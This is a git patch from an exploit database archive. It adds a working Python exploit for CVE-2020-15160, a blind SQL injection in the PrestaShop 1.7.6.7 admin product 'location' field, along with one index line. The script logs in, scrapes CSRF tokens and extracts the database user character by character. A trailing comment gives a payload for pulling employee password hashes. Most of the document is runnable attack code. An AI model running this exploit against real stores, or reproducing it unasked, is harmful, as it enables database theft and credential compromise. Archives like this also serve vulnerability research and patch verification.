From 80c35fa8647b1a01df65c9302aea90c7c3e3d638 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 10 Apr 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-04-10 1 changes to exploits/shellcodes PrestaShop 1.7.6.7 - 'location' Blind Sql Injection --- exploits/php/webapps/49755.py | 128 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 129 insertions(+) create mode 100755 exploits/php/webapps/49755.py diff --git a/exploits/php/webapps/49755.py b/exploits/php/webapps/49755.py new file mode 100755 index 000000000..1bd5e20d1 --- /dev/null +++ b/exploits/php/webapps/49755.py @@ -0,0 +1,128 @@ +# Exploit Title: PrestaShop 1.7.6.7 - 'location' Blind Sql Injection +# Date: 2021-04-08 +# Exploit Author: Vanshal Gaur +# Vendor Homepage: https://www.prestashop.com/ +# Version: 1.7.5.x < 1.7.6.8 +# Tested on: Debian 10 (buster) +# CVE : CVE-2020-15160 + +#!/usr/bin/python3 + +''' + +Setup Vulnerable Docker on "localhost:8080": + +docker network create prestashop-net +docker run -ti --name mysql_z --network prestashop-net -e MYSQL_ROOT_PASSWORD=admin -p 3307:3306 -d mysql:5.7 +docker run -ti --name prestashop_z --network prestashop-net -e DB_SERVER=mysql_z -p 8080:80 -d prestashop/prestashop:1.7.6.7 +''' + +import requests +import sys +from lxml import html +import re + + +if len(sys.argv) != 7: + print( + ''' + Exploit By: Vanshal Gaur + Twitter Handle: @Vanshalg + + Exploit: CVE-2020-15160 PrestaShop blind Sql Injection 1.7.5.0 < 1.7.6.8 + + Before Running the script make sure to login and change "Combinations" to "Simple product" of the product and give that productid. + + Script will retrive the output of user() function, edit payload in script to retrive other data (Tested With Prestashop 1.7.6.7) + + Usage: python3 {} email password localhost 8080 productid /adminpath + + python3 exploit.py "test@gmail.com" "password" localhost 8080 11 /admin123 + '''.format(sys.argv[0]) + ) + sys.exit(1) + +print("Exploiting...(Be Patient)\n") +email = sys.argv[1] +password = sys.argv[2] +target_host = sys.argv[3] +target_port = sys.argv[4] +product_id = sys.argv[5] +admin_path = sys.argv[6] +target = "http://"+target_host+":"+target_port + +# proxies = {"http": "http://127.0.0.1:8081", "https": "http://127.0.0.1:8081"} + +s = requests.Session() + +def login(s,target,password,email,admin_path): + url = target+admin_path+"/index.php" + + data = {"ajax": "1", "token": '', "controller": "AdminLogin", "submitLogin": "1", "passwd": "TEMP", "email": "test@email.com"} + data["passwd"] = password + data["email"] = email + r = s.post(url, data=data) + +login(s,target,password,email,admin_path) + + +token_ext = s.get(target+admin_path+"/") +token_junk = re.findall("sell/catalog/pro.*_token\=.*",token_ext.text) +token_spit = re.split("\"",token_junk[0]) +token_2 = re.split("\?",token_spit[0]) +token = token_2[1] + + +def productDetails_formtoken(s,target,product_id,admin_path): + headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + + q = s.get(target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token,headers=headers) + tree = html.fromstring(q.text) + output = tree.xpath("//input[contains(@name,'form[_token]')]/@value") + form_token = ''.join(output) + return form_token + +form_token = productDetails_formtoken(s,target,product_id,admin_path) + + +def productDetails_form_location(s,target,token,product_id,admin_path): + headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + + q = s.get(target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token,headers=headers) + tree = html.fromstring(q.text) + output = tree.xpath("//input[contains(@name,'form[step3][location]')]/@value") + form_location = ''.join(output) + + return form_location + + + + +def sqli(s,token,form_token,payload,target,product_id,admin_path): + for j in range(32, 126): + + sql_payload = payload.replace("[CHAR]", str(j)) + + url = target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token + headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} + data = {"form[step1][name][1]": "Blind Sql Injection @Vanshalg", "form[step1][type_product]": "0", "form[step1][description_short][1]": "

Regular fit, round neckline, short sleeves. Made of extra long staple pima cotton.

\r\n

", "form[step1][description][1]": "

Symbol of lightness and delicacy, the hummingbird evokes curiosity and joy. Studio Design' PolyFaune collection features classic products with colorful patterns, inspired by the traditional japanese origamis. To wear with a chino or jeans. The sublimation textile printing process provides an exceptional color rendering and a color, guaranteed overtime.

", "form[step1][features][0][feature]": "1", "form[step1][features][0][value]": "4", "form[step1][features][0][custom_value][1]": '', "form[step1][features][1][feature]": "2", "form[step1][features][1][value]": "8", "form[step1][features][1][custom_value][1]": '', "form[step1][id_manufacturer]": "1", "show_variations": "0", "form[step6][reference]": "demo_1", "form[step1][qty_0_shortcut]": "0", "form[step1][price_shortcut]": "23.900000", "form[step1][price_ttc_shortcut]": "23.9", "form[step2][id_tax_rules_group]": "1", "form[step1][id_category_default]": "4", "form[step1][categories][tree][]": "2", "form[step1][categories][tree][]": "3", "form[step1][categories][tree][]": "4", "ignore": "4", "form[step1][new_category][name]": '', "form[step1][new_category][id_parent]": "2", "form[step3][qty_0]": "0", "form[step3][minimal_quantity]": "1", "form[step3][location]": "TEST", "form[step3][low_stock_threshold]": '', "form[step3][virtual_product][is_virtual_file]": "0", "form[step3][virtual_product][name]": '', "form[step3][virtual_product][nb_downloadable]": '', "form[step3][virtual_product][expiration_date]": '', "form[step3][virtual_product][nb_days]": "0", "form[step3][pack_stock_type]": "3", "form[step3][attributes]": '', "product_combination_bulk[quantity]": '', "product_combination_bulk[cost_price]": '', "product_combination_bulk[impact_on_weight]": '', "product_combination_bulk[impact_on_price_te]": '', "product_combination_bulk[impact_on_price_ti]": '', "product_combination_bulk[date_availability]": '', "product_combination_bulk[reference]": '', "product_combination_bulk[minimal_quantity]": '', "product_combination_bulk[low_stock_threshold]": '', "product_combination_bulk[_token]": "0Dj8tJ3zd6YfSNgyxRFe6CfNbuMac6mn8rm_Gd52-to", "form[step3][out_of_stock]": "2", "form[step3][available_now][1]": '', "form[step3][available_later][1]": '', "form[step3][available_date]": '', "form[step4][width]": "0", "form[step4][height]": "0", "form[step4][depth]": "0", "form[step4][weight]": "0", "form[step4][additional_delivery_times]": "1", "form[step4][delivery_in_stock][1]": '', "form[step4][delivery_out_stock][1]": '', "form[step4][additional_shipping_cost]": "0.000000", "form[step2][price]": "23.900000", "form[step2][price_ttc]": "23.9", "form[step2][unit_price]": "0.000000", "form[step2][unity]": '', "form[step2][ecotax]": "0.000000", "form[step2][id_tax_rules_group]": "1", "form[step2][wholesale_price]": "0.000000", "form[step2][specific_price][sp_id_shop]": "1", "form[step2][specific_price][sp_id_currency]": '', "form[step2][specific_price][sp_id_country]": '', "form[step2][specific_price][sp_id_group]": '', "form[step2][specific_price][sp_id_product_attribute]": '', "form[step2][specific_price][sp_from]": '', "form[step2][specific_price][sp_to]": '', "form[step2][specific_price][sp_from_quantity]": "1", "form[step2][specific_price][leave_bprice]": "1", "form[step2][specific_price][sp_reduction]": "0.000000", "form[step2][specific_price][sp_reduction_type]": "amount", "form[step2][specific_price][sp_reduction_tax]": "1", "form[step2][specificPricePriority_0]": "id_shop", "form[step2][specificPricePriority_1]": "id_currency", "form[step2][specificPricePriority_2]": "id_country", "form[step2][specificPricePriority_3]": "id_group", "form[step5][meta_title][1]": '', "form[step5][meta_description][1]": '', "form[step5][link_rewrite][1]": "hummingbird-printed-t-shirt", "form[step5][redirect_type]": "301-category", "form[step6][visibility]": "both", "form[step6][display_options][available_for_order]": "1", "form[step6][display_options][show_price]": "1", "form[step6][tags][1]": '', "form[step6][condition]": "new", "form[step6][isbn]": '', "form[step6][ean13]": '', "form[step6][upc]": '', "form[step6][attachment_product][name]": '', "form[step6][attachment_product][description]": '', "form[id_product]": "1", "form[_token]": "4KtBNSbjc--GLbsVr__-wqC5Qw2hQKDXh6zb8vWKBwA", "form[step1][active]": "1"} + data["form[_token]"] = form_token + data["form[step3][location]"] = sql_payload + data["form[id_product]"] = product_id + # print(sql_payload) + r = s.post(url, headers=headers, data=data) + + if(productDetails_form_location(s,target,token,product_id,admin_path) == "1"): + return j + return None + + +for i in range(1,41): + payload = "0'|(ascii(substr(user(),%d,1)) regexp [CHAR])#" % i + extracted_char = chr(sqli(s,token,form_token,payload,target,product_id,admin_path)) + sys.stdout.write(extracted_char) + sys.stdout.flush() +print("\n(+) done!") + +#PAYLOAD TO EXTRACT PASSWORD: +# payload: 0'|ascii((substr((select passwd from ps_employee),1,1)) regexp [CHAR]#) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 51f9be3e7..175338e5b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43932,3 +43932,4 @@ id,file,description,date,author,type,platform,port 49751,exploits/php/webapps/49751.txt,"CMSimple 5.2 - 'External' Stored XSS",2021-04-08,"Quadron Research Lab",webapps,php, 49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple, 49753,exploits/php/webapps/49753.txt,"Composr 10.0.36 - Remote Code Execution",2021-04-08,"Orion Hridoy",webapps,php, +49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,